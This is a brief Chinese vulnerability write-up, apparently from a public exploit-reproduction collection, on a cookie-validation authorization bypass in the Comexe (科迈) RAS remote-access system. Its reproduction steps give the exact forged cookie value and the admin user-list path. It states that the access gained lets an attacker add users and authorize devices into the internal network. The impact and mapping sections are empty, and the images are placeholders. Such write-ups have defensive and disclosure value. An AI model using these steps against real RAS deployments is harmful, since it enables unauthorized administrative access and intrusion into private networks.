# 科迈 RAS系统 Cookie验证越权漏洞

# 漏洞描述

科迈 RAS系统 存在Cookie验证越权,当 RAS_Admin_UserInfo_UserName 设置为 admin 时可访问后台

# 漏洞影响


# 网络测绘


# 漏洞复现

登录页面如下

img

添加Cookie

RAS_Admin_UserInfo_UserName=admin
1

img

访问 /Server/CmxUser.php?pgid=UserList

img

获取后可以添加用户,授权登陆设备直接接入内网